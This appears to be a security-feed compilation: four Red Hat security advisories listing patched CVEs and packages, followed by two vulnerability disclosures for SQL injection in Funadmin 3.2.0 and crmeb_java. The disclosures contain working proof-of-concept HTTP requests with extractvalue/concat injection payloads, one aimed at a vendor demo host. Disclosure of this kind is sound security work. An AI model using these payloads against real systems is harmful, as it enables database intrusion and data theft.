Red Hat Security Advisory 2023-1103-01 - This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: kpatch-patch security update  
Advisory ID:       RHSA-2023:1103-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1103  
Issue date:        2023-03-07  
CVE Names:         CVE-2022-4378  
====================================================================  
1. Summary:

An update for kpatch-patch is now available for Red Hat Enterprise Linux  
8.2 Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS E4S (v. 8.2) - ppc64le, x86_64

3. Description:

This is a kernel live patch module which is automatically loaded by the RPM  
post-install script to modify the code of a running kernel.

Security Fix(es):

* kernel: stack overflow in do_proc_dointvec and proc_skip_spaces  
(CVE-2022-4378)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2152548 - CVE-2022-4378 kernel: stack overflow in do_proc_dointvec and proc_skip_spaces

6. Package List:

Red Hat Enterprise Linux BaseOS E4S (v. 8.2):

Source:  
kpatch-patch-4_18_0-193_90_1-1-4.el8_2.src.rpm  
kpatch-patch-4_18_0-193_91_1-1-4.el8_2.src.rpm  
kpatch-patch-4_18_0-193_93_1-1-3.el8_2.src.rpm  
kpatch-patch-4_18_0-193_95_1-1-2.el8_2.src.rpm  
kpatch-patch-4_18_0-193_98_1-1-1.el8_2.src.rpm

ppc64le:  
kpatch-patch-4_18_0-193_90_1-1-4.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_90_1-debuginfo-1-4.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_90_1-debugsource-1-4.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_91_1-1-4.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_91_1-debuginfo-1-4.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_91_1-debugsource-1-4.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_93_1-1-3.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_93_1-debuginfo-1-3.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_93_1-debugsource-1-3.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_95_1-1-2.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_95_1-debuginfo-1-2.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_95_1-debugsource-1-2.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_98_1-1-1.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_98_1-debuginfo-1-1.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_98_1-debugsource-1-1.el8_2.ppc64le.rpm

x86_64:  
kpatch-patch-4_18_0-193_90_1-1-4.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_90_1-debuginfo-1-4.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_90_1-debugsource-1-4.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_91_1-1-4.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_91_1-debuginfo-1-4.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_91_1-debugsource-1-4.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_93_1-1-3.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_93_1-debuginfo-1-3.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_93_1-debugsource-1-3.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_95_1-1-2.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_95_1-debuginfo-1-2.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_95_1-debugsource-1-2.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_98_1-1-1.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_98_1-debuginfo-1-1.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_98_1-debugsource-1-1.el8_2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-4378  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZAcuF9zjgjWX9erEAQiXgRAApccr26Oub6U9TlUdxdqDFprKVYzBfeDq  
G16IDPwGU+szcSUtV/+q1WS6Qg44/vLdhq8VDP960NZdxdADosvXUd9l0pDoi5Mz  
Smmntkjokf7SDtTVr0VEmGU1dxD4aWkyGmV6vYGjcYxx+/U4hFR7JLH6GRh203zV  
uY/fkJBeQjxHL+5xfeHxX4DIeO+kChSmbESl9D0I39zRt78yuZk9uuFS2jEaDvAK  
Qk9VgL8c2v/RjUZqgXU/Vf6KODryjk+SC1p7OOCt9vO6ytF2gr2C9F6VQlUt9xe2  
GPds9nZh4qPaLbRIAj3k7uYpH8TIdbJ9KflCAj1SU+J1pYZKQGuGQCyUfJAXLMF3  
MQzm9Gq9TWb4OcUV10pZRGcYKKP/hcqh2J4ssh8mOcMen9mNvi1pv8PrJJVkahCO  
1pGRLKG88XMKECTSMyRtgjwnx0yYZyZN+JuMHjX74dmglIYgqp+HKh7u2iL0NYEX  
v6DwIrG/ealgpx4DNENQmfHsr+0z7O6TQWtPNiECfyORuJG/7g1MjCMB5o1RtAgj  
LcHL8/UbuWTifCk7rJ1Z1F2cJrpJ5fHKZ922U1JDbiPtK2mBw2I/RiVbYlMzPmPF  
itlD7NMz6jaVcDR1ogNPkQnJnI4JSwvPuT2HlWLyprKBEqk3Q/VwQKiwcTg6DArC  
Piyibz2Gyrw=tAzH  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1103-01

Red Hat Security Advisory 2023-1092-01 - The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: kernel-rt security and bug fix update  
Advisory ID:       RHSA-2023:1092-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1092  
Issue date:        2023-03-07  
CVE Names:         CVE-2022-4378 CVE-2022-42703  
====================================================================  
1. Summary:

An update for kernel-rt is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux for Real Time (v. 7) - noarch, x86_64  
Red Hat Enterprise Linux for Real Time for NFV (v. 7) - noarch, x86_64

3. Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables  
fine-tuning for systems with extremely high determinism requirements.

Security Fix(es):

* kernel: stack overflow in do_proc_dointvec and proc_skip_spaces  
(CVE-2022-4378)

* kernel: use-after-free related to leaf anon_vma double reuse  
(CVE-2022-42703)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* kernel-rt: update to the latest RHEL7.9.z21 source tree (BZ#2159523)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2133483 - CVE-2022-42703 kernel: use-after-free related to leaf anon_vma double reuse  
2152548 - CVE-2022-4378 kernel: stack overflow in do_proc_dointvec and proc_skip_spaces

6. Package List:

Red Hat Enterprise Linux for Real Time for NFV (v. 7):

Source:  
kernel-rt-3.10.0-1160.88.1.rt56.1233.el7.src.rpm

noarch:  
kernel-rt-doc-3.10.0-1160.88.1.rt56.1233.el7.noarch.rpm

x86_64:  
kernel-rt-3.10.0-1160.88.1.rt56.1233.el7.x86_64.rpm  
kernel-rt-debug-3.10.0-1160.88.1.rt56.1233.el7.x86_64.rpm  
kernel-rt-debug-debuginfo-3.10.0-1160.88.1.rt56.1233.el7.x86_64.rpm  
kernel-rt-debug-devel-3.10.0-1160.88.1.rt56.1233.el7.x86_64.rpm  
kernel-rt-debug-kvm-3.10.0-1160.88.1.rt56.1233.el7.x86_64.rpm  
kernel-rt-debug-kvm-debuginfo-3.10.0-1160.88.1.rt56.1233.el7.x86_64.rpm  
kernel-rt-debuginfo-3.10.0-1160.88.1.rt56.1233.el7.x86_64.rpm  
kernel-rt-debuginfo-common-x86_64-3.10.0-1160.88.1.rt56.1233.el7.x86_64.rpm  
kernel-rt-devel-3.10.0-1160.88.1.rt56.1233.el7.x86_64.rpm  
kernel-rt-kvm-3.10.0-1160.88.1.rt56.1233.el7.x86_64.rpm  
kernel-rt-kvm-debuginfo-3.10.0-1160.88.1.rt56.1233.el7.x86_64.rpm  
kernel-rt-trace-3.10.0-1160.88.1.rt56.1233.el7.x86_64.rpm  
kernel-rt-trace-debuginfo-3.10.0-1160.88.1.rt56.1233.el7.x86_64.rpm  
kernel-rt-trace-devel-3.10.0-1160.88.1.rt56.1233.el7.x86_64.rpm  
kernel-rt-trace-kvm-3.10.0-1160.88.1.rt56.1233.el7.x86_64.rpm  
kernel-rt-trace-kvm-debuginfo-3.10.0-1160.88.1.rt56.1233.el7.x86_64.rpm

Red Hat Enterprise Linux for Real Time (v. 7):

Source:  
kernel-rt-3.10.0-1160.88.1.rt56.1233.el7.src.rpm

noarch:  
kernel-rt-doc-3.10.0-1160.88.1.rt56.1233.el7.noarch.rpm

x86_64:  
kernel-rt-3.10.0-1160.88.1.rt56.1233.el7.x86_64.rpm  
kernel-rt-debug-3.10.0-1160.88.1.rt56.1233.el7.x86_64.rpm  
kernel-rt-debug-debuginfo-3.10.0-1160.88.1.rt56.1233.el7.x86_64.rpm  
kernel-rt-debug-devel-3.10.0-1160.88.1.rt56.1233.el7.x86_64.rpm  
kernel-rt-debuginfo-3.10.0-1160.88.1.rt56.1233.el7.x86_64.rpm  
kernel-rt-debuginfo-common-x86_64-3.10.0-1160.88.1.rt56.1233.el7.x86_64.rpm  
kernel-rt-devel-3.10.0-1160.88.1.rt56.1233.el7.x86_64.rpm  
kernel-rt-trace-3.10.0-1160.88.1.rt56.1233.el7.x86_64.rpm  
kernel-rt-trace-debuginfo-3.10.0-1160.88.1.rt56.1233.el7.x86_64.rpm  
kernel-rt-trace-devel-3.10.0-1160.88.1.rt56.1233.el7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-4378  
https://access.redhat.com/security/cve/CVE-2022-42703  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZAcuCdzjgjWX9erEAQi7RBAAmp6aI76OfHJJa8HdjsKOtocLixUbqvAn  
GKMf3vPi2sArtLwZ1zKvKAwXj4xE919ogP4G5JMeMDibAVlfSQj0sl38ScLmYNL8  
VE2Fbgbzh8F4kCuAWur1BahCo2lN7DDVbcFOQ/AchWFzPQ2gyPCwAq0ERQEckiFk  
ky/vG4K660u9qth06v7dCkofYVNqEaSxOQEC8fT9tt8//MZTBuUfI8eXp00evhjA  
GnaBCD8AX4vSAs+dzUP51mbI2w/iQHXM8agMoWIkNymzbV6ZuxmRSPn9xpytPsF7  
B0qxMoXSA3kkGvayHVu4k/DOusr6LJYzd9D9AVlWjgu5PRqymhdNup5Ojseq/s8V  
WuZhjoHXJL43v9uxw0pztb09uwN5tK7QmMWmm2NEX8Uex7nx6JkKHs2Q5CZsbJNk  
g1eYQEuGSVhdmgpkK2UYny4flqErkn9ly1b6o6fci9c2XsQ4e/ydYHbZT5aZmYJJ  
Ax57Mf8mgQZiPITMF8wxpYyOvYRt8PKKGzZwBvPrWv+eqxHZPYlwmSyBkPi2+juy  
a+YAFr+65eQRTQelhf8xwH8MrUA31B8NkkeohruG76ODOhJip4JKCdMam8BAUvN0  
M7ZnMutq6a40TdG0PhJcejqaWeFTsKzxHWk0lF6l0Q92DArk/TssNUDBVamG+YKZ  
Qgqt+POQz3w=y0TD  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1092-01

Red Hat Security Advisory 2023-1042-01 - Custom Metrics Autoscaler Operator for Red Hat OpenShift including security updates.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: Custom Metrics Autoscaler Operator for Red Hat OpenShift (with security updates)  
Advisory ID:       RHSA-2023:1042-01  
Product:           custom-metrics-autoscaler  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1042  
Issue date:        2023-03-06  
CVE Names:         CVE-2022-1705 CVE-2022-1962 CVE-2022-2879  
                   CVE-2022-2880 CVE-2022-27664 CVE-2022-28131  
                   CVE-2022-28327 CVE-2022-30630 CVE-2022-30631  
                   CVE-2022-30632 CVE-2022-30633 CVE-2022-30635  
                   CVE-2022-32148 CVE-2022-32149 CVE-2022-41715  
====================================================================  
1. Summary:

Custom Metrics Autoscaler Operator for Red Hat OpenShift including security  
updates.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

The Custom Metrics Autoscaler Operator for Red Hat OpenShift is an optional  
operator, based on the Kubernetes Event Driven Autoscaler (KEDA), that  
allows workloads to be scaled using additional metrics sources other than  
pod metrics.  
This release builds upon updated compiler, runtime library, and base images  
for the purpose of resolving any potential security issues present in  
previous toolset versions.

This version makes use of newer tools and libraries to address the  
following issues:  
golang: net/http: improper sanitization of Transfer-Encoding header  
(CVE-2022-1705)  
golang: go/parser: stack exhaustion in all Parse* functions (CVE-2022-1962)  
golang: archive/tar: unbounded memory consumption when reading headers  
(CVE-2022-2879)  
golang: net/http/httputil: ReverseProxy should not forward unparseable  
query parameters (CVE-2022-2880)  
golang: net/http: handle server errors after sending GOAWAY  
(CVE-2022-27664)  
golang: encoding/xml: stack exhaustion in Decoder.Skip (CVE-2022-28131)  
golang: crypto/elliptic: panic caused by oversized scalar (CVE-2022-28327)  
golang: io/fs: stack exhaustion in Glob (CVE-2022-30630)  
golang: compress/gzip: stack exhaustion in Reader.Read (CVE-2022-30631)  
golang: path/filepath: stack exhaustion in Glob (CVE-2022-30632)  
golang: encoding/xml: stack exhaustion in Unmarshal (CVE-2022-30633)  
golang: encoding/gob: stack exhaustion in Decoder.Decode (CVE-2022-30635)  
golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For  
not working (CVE-2022-32148)  
golang: golang.org/x/text/language: ParseAcceptLanguage takes a long time  
to parse complex tags (CVE-2022-32149)  
golang: regexp/syntax: limit memory used by parsing regexps  
(CVE-2022-41715)

3. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2077689 - CVE-2022-28327 golang: crypto/elliptic: panic caused by oversized scalar  
2100763 - No space to specify operator.logLevel from Form view when create KedaController  
2107342 - CVE-2022-30631 golang: compress/gzip: stack exhaustion in Reader.Read  
2107371 - CVE-2022-30630 golang: io/fs: stack exhaustion in Glob  
2107374 - CVE-2022-1705 golang: net/http: improper sanitization of Transfer-Encoding header  
2107376 - CVE-2022-1962 golang: go/parser: stack exhaustion in all Parse* functions  
2107383 - CVE-2022-32148 golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working  
2107386 - CVE-2022-30632 golang: path/filepath: stack exhaustion in Glob  
2107388 - CVE-2022-30635 golang: encoding/gob: stack exhaustion in Decoder.Decode  
2107390 - CVE-2022-28131 golang: encoding/xml: stack exhaustion in Decoder.Skip  
2107392 - CVE-2022-30633 golang: encoding/xml: stack exhaustion in Unmarshal  
2113945 - Icon of Custom Metrics Autoscaler is blurry on operatorhub  
2118404 - Wrong GitHub link for Custom Metrics Autoscaler in OperatorHub  
2124669 - CVE-2022-27664 golang: net/http: handle server errors after sending GOAWAY  
2132867 - CVE-2022-2879 golang: archive/tar: unbounded memory consumption when reading headers  
2132868 - CVE-2022-2880 golang: net/http/httputil: ReverseProxy should not forward unparseable query parameters  
2132872 - CVE-2022-41715 golang: regexp/syntax: limit memory used by parsing regexps  
2134010 - CVE-2022-32149 golang: golang.org/x/text/language: ParseAcceptLanguage takes a long time to parse complex tags

5. JIRA issues fixed (https://issues.jboss.org/):

OCPNODE-1260 - Wrong links to CMA repository in CMA operator in OperatorHub

6. References:

https://access.redhat.com/security/cve/CVE-2022-1705  
https://access.redhat.com/security/cve/CVE-2022-1962  
https://access.redhat.com/security/cve/CVE-2022-2879  
https://access.redhat.com/security/cve/CVE-2022-2880  
https://access.redhat.com/security/cve/CVE-2022-27664  
https://access.redhat.com/security/cve/CVE-2022-28131  
https://access.redhat.com/security/cve/CVE-2022-28327  
https://access.redhat.com/security/cve/CVE-2022-30630  
https://access.redhat.com/security/cve/CVE-2022-30631  
https://access.redhat.com/security/cve/CVE-2022-30632  
https://access.redhat.com/security/cve/CVE-2022-30633  
https://access.redhat.com/security/cve/CVE-2022-30635  
https://access.redhat.com/security/cve/CVE-2022-32148  
https://access.redhat.com/security/cve/CVE-2022-32149  
https://access.redhat.com/security/cve/CVE-2022-41715  
https://access.redhat.com/security/updates/classification/#moderate

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZAaFRtzjgjWX9erEAQj/4hAAldx0//Hb5yYz4eiZy9WZCnnao56WgBbQ  
DBxiep9b9bhaoOUDDw8g7ClxafMHpp7u7BmQksA9+bnqcBEqNg8OV5mNqglzoPKa  
qJkHKI837qX1NUBNwmmj/32cjT0czC0N+QiTM0LoPyWQmiw1pJWriHMfLyFIfcgw  
QUDemm7XzYiRYxf+ViHaufndsOGYVplmysdO2C9qGi+Lckzl1fr5GeJgPD4QL/4h  
ebpgV2XQb5drYIiBt224HruJNmj2j4iP32hxf3IYOJbihk+EB2ZzkINmDq27a5mf  
qrJSJn9Q9ZiMyVP7NqK04HoW/Ntj9ZU0atzHnVVd470TFubgRKOAGsnS68fIC5XP  
ZbCPWoGC+mZzzsZrgK+3vMX90Y5rmBXWPHLLooSWCha4TpEhg0rlzmw4dzW+Uumz  
M48n+SfIde5b6aCsPAmnNeLNy0UQ9iDcv4Yzmc4qdEfWigRgULaoIHOqJGW0UVZg  
ffqcu4S7tihJij5L4j20vbTGWZgn5KAmTY7Dxt/S1yN0Re5uBzMXu0gri5TtKJgM  
CEfULzNSXgjE1C8hrPPKKR6La+cyIbAXCocPTlTepwE+mqVtHqAHkvKooOCr45um  
BRwrMWahWGgOpZ/COrPu0ccgaz1GRtmArK/pjbXswM8ep2wa6oMaQgf4IA7/1UUF  
7NvSWcK9Wr0=F/ST  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1042-01

Red Hat Security Advisory 2023-1079-01 - An update for osp-director-downloader-container, osp-director-agent-container and osp-director-operator-container is now available for Red Hat OpenStack Platform 16.2 (Train).

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: Red Hat OpenStack Platform 16.2 (osp-director-downloader-container, osp-director-agent-container and osp-director-operator-container) security update  
Advisory ID:       RHSA-2023:1079-01  
Product:           Red Hat OpenStack Platform  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1079  
Issue date:        2023-03-06  
CVE Names:         CVE-2021-46848 CVE-2022-2879 CVE-2022-4415  
                   CVE-2022-35737 CVE-2022-40303 CVE-2022-40304  
                   CVE-2022-41715 CVE-2022-41717 CVE-2022-47629  
====================================================================  
1. Summary:

An update for osp-director-downloader-container,  
osp-director-agent-container and osp-director-operator-container is now  
available for Red Hat OpenStack Platform 16.2 (Train).

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

Security Fix(es):

* archive/tar: unbounded memory consumption when reading headers  
(CVE-2022-2879)

* regexp/syntax: limit memory used by parsing regexps (CVE-2022-41715)

* net/http: An attacker can cause excessive memory growth in a Go server  
accepting HTTP/2 requests (CVE-2022-41717)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page listed in the References section.

3. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2132867 - CVE-2022-2879 golang: archive/tar: unbounded memory consumption when reading headers  
2132872 - CVE-2022-41715 golang: regexp/syntax: limit memory used by parsing regexps  
2161274 - CVE-2022-41717 golang: net/http: An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests

5. JIRA issues fixed (https://issues.jboss.org/):

OSPK8-664 - Unexpected "unassigned" hostRefs in OSBMS halt further reconcile loops

6. References:

https://access.redhat.com/security/cve/CVE-2021-46848  
https://access.redhat.com/security/cve/CVE-2022-2879  
https://access.redhat.com/security/cve/CVE-2022-4415  
https://access.redhat.com/security/cve/CVE-2022-35737  
https://access.redhat.com/security/cve/CVE-2022-40303  
https://access.redhat.com/security/cve/CVE-2022-40304  
https://access.redhat.com/security/cve/CVE-2022-41715  
https://access.redhat.com/security/cve/CVE-2022-41717  
https://access.redhat.com/security/cve/CVE-2022-47629  
https://access.redhat.com/security/updates/classification/#moderate

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZAYw69zjgjWX9erEAQhpKw/+IoljDi48GfOED0GN7xDhf0dClmlzuPnM  
ozrwsuBpcFWlY62saZacWkG4UBfLTubkMEdkuWlNrP0TNxSFOzWRDBZpsp6KHzsg  
5t8doz9jHTsPP60q/PEOni6Jw8Z5zCN9qVRprNPObEAZdoHaPZpQI6dJkZMSd6Pf  
q40hJkI0nu+GEknlJtUbJqaCf7sED6/Tn2uGrFYuL+uKEcw7Dh8Up0c3QFYjHxCH  
H4kTOyiBCsbQNztdDhR+/hBEezSFSw/WgXynvzS2SyP4gQ/AhV5af53KJ0nJieC7  
KnH9RKVR2h5PkRRGiH3yBG/Vl4Y13P4fh3rwjUWZGCp4LhjzS0pqjsyYzBnFJODT  
GjX+nEi5z15OMuxO6YrignuDfMMisz2OUY1XZa2M9CQUDBkQyikwSOdMfDk2LVS+  
dznlfqNejn7CDA4mUwkpQ1NsQXi9MEVI9UhN5sf/SASoIj1uGG20fot1w1gQyEka  
kFpwz2FyvXA8xGruJbRmV6QuWLxZmXeosjRWQZhJL9KcuuAdQgVSfqFQYHrEGOxa  
oJbqdOv1GAauwPPhH49eoShzi3jwRyzuEQIsxwz73nY+TSOHmTdnynn+nSSREXb0  
qNkHwGMi9RsC+HmXj/qzmwge5BjChwLQxLsAj+6FOCwFvtyU9jbr/y4hq8CAmGFa  
eAniE3J/0sc=r2R4  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1079-01

Funadmin v3.2.0 was discovered to contain a SQL injection vulnerability via the selectFields parameter at \member\Member.php.

Vulnerability Product:funadmin  
Vulnerability version:.3.2.0  
Vulnerability type:sql injection  
Vulnerability Details：  
member.memberLevel#selectFields\[value\] has sql injection vulnerability  
Vulnerability location app\\backend\\controller\\member\\MemberLevel.php# is called  
app\\backend\\controller\\member\\Member.php#index method  

After getting the parameter selectFields here, continue to enter  
selectFields method  
app\\common\\traits\\Curd.php#selectList  
  
Finally, enter \\vendor\\topthink\\think-orm\\src\\db\\BaseQuery.php#field is spliced ​​into sql without filtering to cause sql injection

Vulnerability recurrence  
poc  
GET /backend/member.memberLevel/index?parentField=pid&selectFields%5Bname%5D=name&selectFields%5Bvalue%5D=extractvalue%281%2Cconcat%28char%28126%29%2Cuser()%29%29 HTTP/1.1 Host: 192.168.3.129:8092 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.9 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Cookie: Hm_lvt_ce074243117e698438c49cd037b593eb=1673498041; PHPSESSID=591a908579ac738f0fc0f53d05c6aa51; think_lang=zh-cn; Hm_lvt_8dcaf664827c0e8ae52287ebb2411aed=1674888420; Hm_lpvt_8dcaf664827c0e8ae52287ebb2411aed=1674888420; auth_account=YToxOntzOjEyOiJhY2Nlc3NfdG9rZW4iO3M6MzI3OiJleUowZVhBaU9pSktWMVFpTENKaGJHY2lPaUpJVXpJMU5pSjkuZXlKdFpXMWlaWEpmYVdRaU9qRTFORGdzSW1Gd2NHbGtJam9pSWl3aVlYQndjMlZqY21WMElqb2lJaXdpYVhOeklqb2lhSFIwY0hNNkx5OTNkM2N1Wm5WdVlXUnRhVzR1WTI5dElpd2lZWFZrSWpvaWFIUjBjSE02THk5M2QzY3VablZ1WVdSdGFXNHVZMjl0SWl3aWMyTnZjR1Z6SWpvaWNtOXNaVjloWTJObGMzTWlMQ0pwWVhRaU9qRTJOelE0T0RrMU1EQXNJbTVpWmlJNk1UWTNORGc0T1RVd01Dd2laWGh3SWpveE5qYzFOVGd3TnpBd2ZRLkJITHd5WU5nNkpVVUZmMFFucGM0aHk2YlZ1c1V6WkVqR3N2SElva0pxYU0iO30%3D; clound_account=YTo0OntzOjI6ImlkIjtpOjE1NDg7czo4OiJ1c2VybmFtZSI7czoxMDoibXlmdW5hZG1pbiI7czo4OiJuaWNrbmFtZSI7czowOiIiO3M6NjoiYXZhdGFyIjtzOjM2OiIvc3RhdGljL2Zyb250ZW5kL2ltYWdlcy9hdmF0YXIvNi5qcGciO30%3D X-Csrf-Token: 57cf5483b08025dc11534643f460d0fc X-Requested-With: XMLHttpRequest Accept-Encoding: gzip

CVE-2023-24775: member.memberLevel#selectFields[value] has sql injection vulnerability · Issue #9 · funadmin/funadmin

CRMEB <=1.3.4 is vulnerable to SQL Injection via /api/admin/user/list.

\[Suggested description\]  
sql injection vulnerability exists in crmeb\_java <=1.3.4  
/api/admin/user/list endpoint Unfiltered parameters 'level' cause sqli

\[Vulnerability Type\]  
SQLi

\[Vendor of Product\]  
https://github.com/crmeb/crmeb\_java

\[Affected Product Code Base\]  
<=1.3.4

\[Affected Component\]

GET /api/admin/user/list?labelId=&userType=routine&sex=&isPromoter=&country=&payCount=9&accessType=0&dateLimit=&keywords=&province=&city=&page=1&limit=15&level=1+and+extractvalue(1,CONCAT(1,user()))&groupId=1&temp=1675070029&addres=a% HTTP/2  
Host: api.java.crmeb.net  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0  
Accept: application/json, text/plain, _/_  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
Accept-Encoding: gzip, deflate  
Authori-Zation: 0d8ed99c6e51404f82a22ba15332300a  
Origin: https://admin.java.crmeb.net  
Referer: https://admin.java.crmeb.net/  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-site  
Te: trailers

\[Attack Type\]  
Remote

\[Vulnerability details\]  
step 1 login admin click user Manager and click search button  

step 2 intercept request use burpsuite  

step 3 insert payload in paramter “level”

level=1+and+extractvalue(1,CONCAT(1,user()))

https://api.java.crmeb.net/api/admin/user/list?labelId=&userType=routine&sex=&isPromoter=&country=&payCount=9&accessType=0&dateLimit=&keywords=&province=&city=&page=1&limit=15&level=1+and+extractvalue(1,CONCAT(1,user()))&groupId=1&temp=1675070029&addres=a%

there you can see it

\[Impact Code execution\]  
true  
\[Cause of vulnerability\]  
\\crmeb\\crmeb-service\\src\\main\\resources\\mapper\\user\\UserMapper.xml  
line 36 "${level}"  
When using "${}", program will do not do any processing, and directly splice the value into the sql statement lead sqli

CVE-2023-25223: There is a sql injection vulnerability exists in crmeb_java  · Issue #9 · crmeb/crmeb_java

